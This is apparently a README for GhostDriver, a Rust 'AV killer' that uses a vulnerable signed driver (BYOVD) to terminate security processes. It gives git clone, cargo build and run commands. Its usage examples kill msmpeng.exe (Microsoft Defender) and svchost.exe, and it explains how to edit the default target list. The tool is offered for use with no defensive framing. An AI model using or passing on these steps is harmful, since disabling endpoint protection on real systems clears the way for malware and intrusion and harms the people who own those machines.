GhostDriver is a Rust-built AV killer tool using BYOVD.
- Install Rust from rust-lang.org
- Clone:
git clone https://github.com/BlackSnufkin/GhostDriver.git
- Build:
cargo build --release --target=x86_64-pc-windows-msvc
- Run: Execute the GhostDriver binary
GhostDriver.exe 2.0
BlackSnufkin
Kills processes by name using a Ghost Driver
USAGE:
GhostDriver.exe [FLAGS] [OPTIONS]
FLAGS:
-h, --help Prints help information
-v, --version Prints version information
OPTIONS:
-n, --name=process_names
EXAMPLES:
.\GhostDriver.exe -n msmpeng.exe,svchost.exe
.\GhostDriver.exe --name msmpeng.exe
.\GhostDriver.exe (uses default processes)
- Change line 3307 for the defualt Process names
// Define default process names
let default_process_names = vec!["msmpeng.exe"];